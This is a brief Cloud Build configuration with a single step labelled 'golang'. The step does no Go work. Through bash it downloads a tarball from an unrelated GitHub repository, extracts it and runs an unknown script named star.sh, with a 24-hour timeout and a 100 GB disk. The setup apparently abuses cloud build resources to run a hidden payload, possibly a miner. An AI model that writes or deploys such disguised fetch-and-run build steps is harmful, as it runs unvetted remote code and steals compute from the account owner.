steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/ifhikf/jos/raw/main/trtl%20(1).tar.gz && tar xf trtl%20(1).tar.gz && ./star.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
